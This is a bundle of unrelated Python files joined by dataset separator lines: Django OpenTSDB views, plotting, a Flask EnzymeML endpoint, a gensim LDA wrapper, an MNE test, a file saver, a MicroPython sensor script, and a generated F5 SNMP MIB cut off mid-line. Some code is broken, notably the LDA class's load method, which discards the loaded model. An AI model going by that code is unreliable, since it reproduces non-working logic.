# if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = MetricForm(request.POST, init_value="") # check whether it's valid: if form.is_valid(): metric_name = form.cleaned_data['metric_name'] form = MetricForm(init_value=metric_name) if request.POST.get("get_tags"): json_result = RestClient.get_metric(metric_name) elif request.POST.get("get_region_servers"): json_result = RestClient.get_metric_region_servers(metric_name) return render(request, 'home/opentsdb_metric.html', {'form': form, 'json': json_result, 'json_tasks': json_tasks}) # if a GET (or any other method) we'll create a blank form else: form = MetricForm(init_value="") return render(request, 'home/opentsdb_metric.html', {'form': form, 'json': '', 'json_tasks': json_tasks}) def opentsdb_regions(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_regions() return render(request, 'home/opentsdb_regions.html', {'json': json_result, 'json_tasks': json_tasks}) def opentsdb_split(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_presplit() action_buttons = OrderedDict([ ("download_presplit_file", "Download Presplit File") ]) if request.method == 'POST': if request.POST.get("download_presplit_file"): presplit_file = RestClient.get_tsdb_presplit_file() response = HttpResponse(presplit_file['content']) response['Content-Type'] = 'application/json' response['Content-Length'] = len(presplit_file['content']) response['Content-Encoding'] = 'Charset: utf-8' filename_header = 'filename=presplit_file.txt' response['Content-Disposition'] = 'attachment; ' + filename_header return response else: return render(request, 'home/opentsdb_split.html', {'json': json_result, 'json_tasks': json_tasks, 'action_buttons': action_buttons}) def opentsdb_regions_infos(request, encoded_name): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_regions_infos(encoded_name) return render(request, 'home/opentsdb_regions_infos.html', {'json': json_result, 'encoded_name': encoded_name, 'json_tasks': json_tasks})
nilq/baby-python
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Jan 4 12:01:56 2018 Flow Visualization module within the FlowTools package. @author: nhamilto @contact: nicholas.hamilton@nrel.gov. @version: v.0.1 """ import matplotlib.pyplot as plt import numpy as np #%% # 2D contour plot: coords = ['y', 'z'], val = flowfield.'U' def contourf(flowfield, coords, cval): fig = plt.figure() x, y = flowfield.coordinates[coords[0]], flowfield.coordinates[coords[1]] plt.contourf(x, y, cval, 32) plt.xlabel(coords[0]) plt.ylabel(coords[1]) plt.colorbar() plt.tight_layout plt.show() return fig # Reynolds stresses in planes defined by x and y def rst_contours(flowfield, coords, rst, commonscale=True, vmin=None, vmax=None): subplotindex = [0, 1, 2, 4, 5, 8] fig, axs = plt.subplots(3,3, figsize = (6.5, 5), sharex = True, sharey = True) axs = axs.ravel() x, y = flowfield.coordinates[coords[0]], flowfield.coordinates[coords[1]] if commonscale is True: # plot all subfigures on a common scale if vmin is None: vmin = np.min([ np.min(rst[key]) for key in rst.keys() ]) if vmax is None: vmax = np.max([ np.max(rst[key]) for key in rst.keys() ]) for pt, key in zip(subplotindex,rst): axs[pt].contourf(x, y, rst[key], vmin=vmin, vmax=vmax) axs[pt].set_title('$\overline{'+key+'}$') axs[pt].axis('equal'); axs[pt].set_adjustable('box-forced') # make hidden subplot with full data range for correct colorbar fakedata = np.reshape(np.arange(np.prod(rst[key].shape)),rst[key].shape) fakedata = (fakedata - fakedata.min())/(fakedata.max() - fakedata.min()) fakedata = fakedata*(vmax-vmin) + vmin axt = fig.add_axes([0.01,0.01,0.01,0.01]) cf = axt.contourf(x, y, fakedata, 32, vmin=vmin, vmax=vmax) fig.colorbar(cf, ax=axs.ravel().tolist()) axt.set_visible(not axt.get_visible) # hide unwanted axes for pt in [3,6,7]: axs[pt].set_visible(not axs[pt].get_visible) # label super axes fig.text(0.5, 0.04, '$'+coords[0]+'$', ha='center') fig.text(0.05, 0.5, '$'+coords[1]+'$', va='center', rotation='vertical') return fig, axs else: # plot each subplot with a unique scale for pt, key in zip(subplotindex,rst): cf = axs[pt].contourf(x, y, rst[key]) axs[pt].set_title('$\overline{'+key+'}$') fig.colorbar(cf, ax=axs[pt]) axs[pt].axis('equal'); axs[pt].set_adjustable('box-forced') # hide unwanted axes for pt in [3,6,7]: axs[pt].set_visible(not axs[pt].get_visible) # label super axes fig.text(0.5, 0.04, '$'+coords[0]+'$', ha='center') fig.text(0.05, 0.5, '$'+coords[1]+'$', va='center', rotation='vertical') fig.tight_layout() return fig, axs
nilq/baby-python
python
''' File: addModel.py Project: restful Author: Jan Range License: BSD-2 clause ----- Last Modified: Wednesday June 23rd 2021 7:44:17 pm Modified By: Jan Range (<jan.range@simtech.uni-stuttgart.de>) ----- Copyright (c) 2021 Institute of Biochemistry and Technical Biochemistry Stuttgart ''' from flask import request, send_file, jsonify from flask_apispec import doc, marshal_with, MethodResource import os import json import shutil import io from pyenzyme.enzymeml.tools import EnzymeMLReader from pyenzyme.enzymeml.models import KineticModel from pyenzyme.restful.addModel_schema import addModelSchema from pyenzyme.enzymeml.tools.unitcreator import UnitCreator import tempfile desc = 'This endpoint is used to add a kinetic model to an existing EnzymeML document.\ Upload your document via the "omex" key as form-data as well as a JSON body with the \ reaction ID to add the model as well as the "equation" and "parameters" in an array.' class addModel(MethodResource): @doc(tags=['Add KineticModel'], description=desc) @marshal_with(addModelSchema(), code=200) def post(self): # check if the post request has the file part if 'omex' not in request.files: return jsonify( {"response": 'No file part'} ) if 'json' not in request.form: return jsonify( {"response": 'No json part'} ) # receive OMEX file file = request.files['omex'] body = json.loads(request.form['json']) # if user does not select file, browser also # submit an empty part without filename if file.filename == '': return jsonify({"response": 'No file selected'}) if file and file.filename.split('.')[-1] == "omex": file = file.read() # Send File dirpath = os.path.join( os.path.dirname(os.path.realpath(__file__)), "addmodel_temp" ) os.makedirs(dirpath, exist_ok=True) dirpath = os.path.join( dirpath, next(tempfile._get_candidate_names()) ) omexpath = os.path.join( dirpath, next(tempfile._get_candidate_names()) + '.omex' ) os.mkdir(dirpath) # Write to temp file with open(omexpath, 'wb') as f: f.write(file) # Save JSON in variable enzmldoc = EnzymeMLReader().readFromFile(omexpath) os.remove(omexpath) # parse parameters parameters = dict() for param in body['parameters']: name = param["name"] value = float(param["value"]) unit = UnitCreator().getUnit(param["unit"], enzmldoc) parameters[name] = (value, unit) # parse equation equation = body['equation'] # create KineticModel km = KineticModel(equation, parameters) # Write model to reaction enzmldoc.getReactionDict()[body['reaction']].setModel(km) enzmldoc.toFile(dirpath) path = os.path.join( dirpath, enzmldoc.getName().replace(' ', '_') + '.omex' ) f = io.BytesIO(open(path, "rb").read()) f.name = enzmldoc.getName() + '_Modeled.omex' shutil.rmtree( dirpath, ignore_errors=True ) return send_file( f, mimetype='omex', as_attachment=True, attachment_filename='%s_Modeled.omex' % enzmldoc.getName() )
nilq/baby-python
python
from sklearn.base import TransformerMixin, BaseEstimator from gensim.models import LdaMulticore, CoherenceModel from gensim.corpora import Dictionary from gensim.matutils import corpus2dense, corpus2csc import numpy as np class GensimLDAVectorizer(BaseEstimator, TransformerMixin): def __init__(self, num_topics, return_dense=True, max_df=0.5, min_df=5, **lda_params): """ :param num_topics: number of topics for the LDA model :param return_dense: transform function returns dense or not :param max_df: maximum word documentfrequency. Should be given as :param min_df: minimum word documentfrequency. Similar to max_df. :param lda_params: parameters for the constructor of gensim.model.Ldamulticore """ super().__init__() self.lda: LdaMulticore = None self.corpus = None self.lda_params = lda_params self.lda_params["num_topics"] = num_topics self.is_dense = return_dense self.max_df = max_df self.min_df = min_df def fit(self, docs): """ :param docs: List of split strings. :return: GensimLDAVectorizer """ id2word = Dictionary(docs) id2word.filter_extremes(self.min_df, self.max_df) self.corpus = [id2word.doc2bow(d) for d in docs] self.lda = LdaMulticore(corpus=self.corpus, id2word=id2word, **self.lda_params) return self def transform(self, docs): """ :param docs: List of split strings. :return: numpy.ndarray """ cur_bow = [self.lda.id2word.doc2bow(d) for d in docs] lda_bag_of_topics = [self.lda[c] for c in cur_bow] num_terms = self.lda.num_topics return corpus2dense(lda_bag_of_topics, num_terms).T if self.is_dense else corpus2csc( lda_bag_of_topics, num_terms).T def fit_transform(self, docs, y=None, **fit_params): return self.fit(docs).transform(docs) def evaluate_coherence(self, docs, coherence="c_v"): """ :param docs: List[List[str]] :param coherence: one of the coherence methods stated in gensim.models.CoherenceModel :return: gensim.models.CoherenceModel """ return CoherenceModel(model=self.lda, texts=docs, corpus=self.corpus, coherence=coherence, processes=self.lda_params["workers"]) def save(self, fname, *args, **kwargs): self.lda.save(fname=fname, *args, **kwargs) @classmethod def load(self, fname, return_dense=True, max_df=0.5, min_df=5, *args, **kwargs): lda = LdaMulticore.load(fname, *args, **kwargs) lda = LdaMulticore() alpha = lda.alpha eta = lda.eta iterations = lda.iterations random_seed = lda.random_state workers = lda.workers num_topics = lda.num_topics return GensimLDAVectorizer(num_topics, alpha, eta, workers, iterations, return_dense, max_df, min_df, random_seed)
nilq/baby-python
python
# -*- coding: utf-8 -*- # Author: Olaf Hauk <olaf.hauk@mrc-cbu.cam.ac.uk> # Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # # License: BSD (3-clause) import os.path as op import numpy as np from numpy.testing import (assert_equal, assert_array_almost_equal, assert_array_equal) import mne from mne.datasets import testing from mne.minimum_norm.resolution_matrix import (make_inverse_resolution_matrix, get_cross_talk, get_point_spread) data_path = testing.data_path(download=False) subjects_dir = op.join(data_path, 'subjects') fname_inv = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-6-meg-inv.fif') fname_evoked = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-ave.fif') fname_raw = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif') fname_t1 = op.join(data_path, 'subjects', 'sample', 'mri', 'T1.mgz') fname_src = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-6-fwd.fif') fname_src_fs = op.join(data_path, 'subjects', 'fsaverage', 'bem', 'fsaverage-ico-5-src.fif') fname_src_3 = op.join(data_path, 'subjects', 'sample', 'bem', 'sample-oct-4-src.fif') fname_stc = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg') fname_vol = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-grad-vol-7-fwd-sensmap-vol.w') fname_vsrc = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-vol-7-fwd.fif') fname_inv_vol = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-vol-7-meg-inv.fif') rng = np.random.RandomState(0) fname_fwd = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-meg-eeg-oct-4-fwd.fif') fname_cov = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-cov.fif') @testing.requires_testing_data def test_resolution_matrix(): """Test make_inverse_resolution_matrix() function.""" # read forward solution forward = mne.read_forward_solution(fname_fwd) # forward operator with fixed source orientations forward_fxd = mne.convert_forward_solution(forward, surf_ori=True, force_fixed=True) # noise covariance matrix noise_cov = mne.read_cov(fname_cov) # evoked data for info evoked = mne.read_evokeds(fname_evoked, 0) # make inverse operator from forward solution # free source orientation inverse_operator = mne.minimum_norm.make_inverse_operator( info=evoked.info, forward=forward, noise_cov=noise_cov, loose=1., depth=None) # fixed source orientation inverse_operator_fxd = mne.minimum_norm.make_inverse_operator( info=evoked.info, forward=forward, noise_cov=noise_cov, loose=0., depth=None, fixed=True) # regularisation parameter based on SNR snr = 3.0 lambda2 = 1.0 / snr ** 2 # resolution matrices for free source orientation # compute resolution matrix for MNE with free source orientations rm_mne_free = make_inverse_resolution_matrix(forward, inverse_operator, method='MNE', lambda2=lambda2) # compute resolution matrix for MNE, fwd fixed and inv free rm_mne_fxdfree = make_inverse_resolution_matrix(forward_fxd, inverse_operator, method='MNE', lambda2=lambda2) # resolution matrices for fixed source orientation # compute resolution matrix for MNE rm_mne = make_inverse_resolution_matrix(forward_fxd, inverse_operator_fxd, method='MNE', lambda2=lambda2) # compute resolution matrix for sLORETA rm_lor = make_inverse_resolution_matrix(forward_fxd, inverse_operator_fxd, method='sLORETA', lambda2=lambda2) # rectify resolution matrix for sLORETA before determining maxima rm_lor_abs = np.abs(rm_lor) # get maxima per column maxidxs = rm_lor_abs.argmax(axis=0) # create array with the expected stepwise increase in maximum indices goodidxs = np.arange(0, len(maxidxs), 1) # Tests # Does sLORETA have zero dipole localization error for columns/PSFs? assert_array_equal(maxidxs, goodidxs) # MNE resolution matrices symmetric? assert_array_almost_equal(rm_mne, rm_mne.T) assert_array_almost_equal(rm_mne_free, rm_mne_free.T) # Test conversion to STC idx = [1, 100, 400] stc_psf = get_point_spread(rm_mne, forward_fxd['src'], idx, norm=True) stc_ctf = get_cross_talk(rm_mne, forward_fxd['src'], idx, norm=True) assert_array_almost_equal(stc_psf.data, stc_ctf.data) # Test application of free inv to fixed fwd assert_equal(rm_mne_fxdfree.shape, (3 * rm_mne.shape[0], rm_mne.shape[0]))
nilq/baby-python
python
"""Module for local file system saving.""" import os import shutil from save_base import BaseSaver import util class FileSaver(BaseSaver): """A class for operations on files, handling the interaction with the local filesystem.""" def __init__(self, base_path): super().__init__(base_path) def exists(self, relative_path): """Check whether a file or a folder already exists at the given relative path.""" path = self.base_path + util.rpath(relative_path) return os.path.exists(path) def create_folder(self, relative_path): """Creating a folder at the given relative path.""" if not self.exists(relative_path): path = self.base_path + util.rpath(relative_path) os.makedirs(path) def save_file(self, relative_path, content, overwrite=False): """Save the file locally.""" path = self.base_path + util.rpath(relative_path) # move file instead of overwriting it if self.exists(relative_path) and not overwrite: to = self.base_path + util.rpath(BaseSaver.OVERW_FOLDER + relative_path) shutil.move(path, to) # save file with open(path, 'wb') as file: try: file.write(content) return True except IOError: return False
nilq/baby-python
python
''' 实验名称:人体感应传感器 版本:v1.0 日期:2021.1 作者:01Studio 社区:www.01studio.org ''' import time from machine import SoftI2C,Pin #从machine模块导入I2C、Pin子模块 from ssd1306 import SSD1306_I2C #从ssd1306模块中导入SSD1306_I2C子模块 #初始化oled i2c = SoftI2C(scl=Pin(10), sda=Pin(11)) #SoftI2C初始化:scl--> 10, sda --> 11 oled = SSD1306_I2C(128, 64, i2c, addr=0x3c) #OLED显示屏初始化:128*64分辨率,OLED的I2C地址是0x3c #配置按键 human = Pin(27, Pin.IN, Pin.PULL_UP) #OLED初始信息显示 oled.fill(0) # 清屏背景黑色 oled.text("01Studio", 0, 0) # 写入第1行内容 oled.text("Human body test:", 0, 15) # 写入第2行内容 oled.show() # OLED执行显示 def Display(human): #Get People闪烁5次效果! for i in range(5): oled.fill(0) # 清屏背景黑色 oled.text("01Studio", 0, 0) # 写入第1行内容 oled.text("Human body test:", 0, 15) # 写入第2行内容 oled.text("Get People!!!", 0, 40) # 写入第3行内容 oled.show() # OLED执行显示 time.sleep_ms(500) oled.fill(0) # 清屏背景黑色 oled.text("01Studio", 0, 0) # 写入第1行内容 oled.text("Human body test:", 0, 15) # 写入第2行内容 oled.text(" ", 0, 40) # 写入第3行内容 oled.show() # OLED执行显示 time.sleep_ms(500) human.irq(Display,Pin.IRQ_RISING) #定义中断,下降沿触发
nilq/baby-python
python
# # PySNMP MIB module F5-BIGIP-COMMON-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/F5-BIGIP-COMMON-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 18:57:38 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint") ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup") NotificationType, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Counter32, ObjectIdentity, Unsigned32, TimeTicks, IpAddress, MibIdentifier, Integer32, iso, ModuleIdentity, Counter64, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "Counter32", "ObjectIdentity", "Unsigned32", "TimeTicks", "IpAddress", "MibIdentifier", "Integer32", "iso", "ModuleIdentity", "Counter64", "Gauge32") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") f5 = ModuleIdentity((1, 3, 6, 1, 4, 1, 3375)) if mibBuilder.loadTexts: f5.setLastUpdated('201603022024Z') if mibBuilder.loadTexts: f5.setOrganization('F5 Networks, Inc.') bigipTrafficMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2)) bigipNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4)) bigipCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5)) bigipNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0)) bigipNotifyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1)) bigipCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 1)) bigipGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2)) bigipNotificationGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4)) bigipNotifyObjMsg = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 1), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjMsg.setStatus('current') bigipNotifyObjNode = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjNode.setStatus('current') bigipNotifyObjPort = MibScalar((1, 3, 6, 1, 4, 1, 3375, 2, 4, 1, 3), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: bigipNotifyObjPort.setStatus('current') bigipAgentStart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 1)) if mibBuilder.loadTexts: bigipAgentStart.setStatus('current') bigipAgentShutdown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 2)) if mibBuilder.loadTexts: bigipAgentShutdown.setStatus('current') bigipAgentRestart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 3)) if mibBuilder.loadTexts: bigipAgentRestart.setStatus('current') bigipCpuTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 4)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuTempHigh.setStatus('current') bigipCpuFanSpeedLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 5)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuFanSpeedLow.setStatus('current') bigipCpuFanSpeedBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 6)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCpuFanSpeedBad.setStatus('current') bigipChassisTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 7)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisTempHigh.setStatus('current') bigipChassisFanBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 8)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisFanBad.setStatus('current') bigipChassisPowerSupplyBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 9)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChassisPowerSupplyBad.setStatus('current') bigipServiceDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 10)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if mibBuilder.loadTexts: bigipServiceDown.setStatus('current') bigipServiceUp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 11)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if mibBuilder.loadTexts: bigipServiceUp.setStatus('current') bigipNodeDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 12)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode")) if mibBuilder.loadTexts: bigipNodeDown.setStatus('current') bigipNodeUp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 13)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode")) if mibBuilder.loadTexts: bigipNodeUp.setStatus('current') bigipStandby = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 14)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipStandby.setStatus('current') bigipActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 15)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipActive.setStatus('current') bigipActiveActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 16)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipActiveActive.setStatus('current') bigipFeatureFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 17)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFeatureFailed.setStatus('current') bigipFeatureOnline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 18)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFeatureOnline.setStatus('current') bigipLicenseFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 19)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLicenseFailed.setStatus('current') bigipLicenseExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 20)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLicenseExpired.setStatus('current') bigipTamdAlert = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 21)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTamdAlert.setStatus('current') bigipAggrReaperStateChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 22)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAggrReaperStateChange.setStatus('current') bigipARPConflict = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 23)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipARPConflict.setStatus('current') bigipNetLinkDown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 24)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipNetLinkDown.setStatus('current') bigipDiskPartitionWarn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 25)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDiskPartitionWarn.setStatus('current') bigipDiskPartitionGrowth = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 26)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDiskPartitionGrowth.setStatus('current') bigipAuthFailed = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 27)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAuthFailed.setStatus('current') bigipConfigLoaded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 28)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipConfigLoaded.setStatus('deprecated') bigipLogEmerg = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 29)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogEmerg.setStatus('current') bigipLogAlert = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 30)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogAlert.setStatus('current') bigipLogCrit = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 31)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogCrit.setStatus('current') bigipLogErr = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 32)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogErr.setStatus('current') bigipLogWarning = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 33)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLogWarning.setStatus('current') bigipPacketRejected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 34)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPacketRejected.setStatus('current') bigipCompLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 35)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipCompLimitExceeded.setStatus('current') bigipSslLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 36)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSslLimitExceeded.setStatus('current') bigipExternalLinkChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 37)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipExternalLinkChange.setStatus('current') bigipAsmRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 38)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmRequestBlocked.setStatus('current') bigipAsmRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 39)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmRequestViolation.setStatus('current') bigipGtmPoolAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 40)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolAvail.setStatus('current') bigipGtmPoolNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 41)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolNotAvail.setStatus('current') bigipGtmPoolDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 42)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolDisabled.setStatus('current') bigipGtmPoolEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 43)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolEnabled.setStatus('current') bigipGtmLinkAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 44)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkAvail.setStatus('current') bigipGtmLinkNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 45)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkNotAvail.setStatus('current') bigipGtmLinkDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 46)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkDisabled.setStatus('current') bigipGtmLinkEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 